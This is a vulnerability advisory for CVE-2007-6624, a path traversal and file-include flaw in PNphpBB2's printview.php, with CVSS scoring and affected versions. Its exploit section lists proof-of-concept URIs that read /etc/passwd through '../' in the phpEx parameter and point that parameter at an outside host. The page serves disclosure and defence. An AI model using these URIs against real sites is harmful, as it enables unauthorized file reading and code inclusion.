CVE-2007-6624 - Path Traversal vulnerability in Pnphpbb 1.2.0i

Publication

2008-01-04

Last modification

2017-09-29

Summary

Directory traversal vulnerability in printview.php in PNphpBB2 1.2i and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the phpEx parameter.

Description

PNphpBB2 is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.An attacker can exploit this issue to execute arbitrary local scripts and retrieve potentially sensitive information.This issue affects PNphpBB2 1.2i and prior versions.

Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: info@vumetric.com.

Exploit

An attacker can exploit this issue with a browser.The following proof-of-concept URIs are available:http://www.example.com/[path]/modules/PNphpBB2/printview.php?phpEx=/../../../../../../../etc/passwd http://www.example.com/[path]/modules/PNphpBB2/printview.php?phpEx=http://www.example2.com

Classification

CWE-22 - Path Traversal

Risk level (CVSS AV:N/AC:M/Au:N/C:P/I:P/A:P)

Medium

6.8

Access Vector

  • Network
  • Adjacent Network
  • Local

Access Complexity

  • Low
  • Medium
  • High

Authentication

  • None
  • Single
  • Multiple

Confident. Impact

  • Complete
  • Partial
  • None

Integrity Impact

  • Complete
  • Partial
  • None

Affected Products

Vendor Product Versions
Pnphpbb Pnphpbb  1.2.0I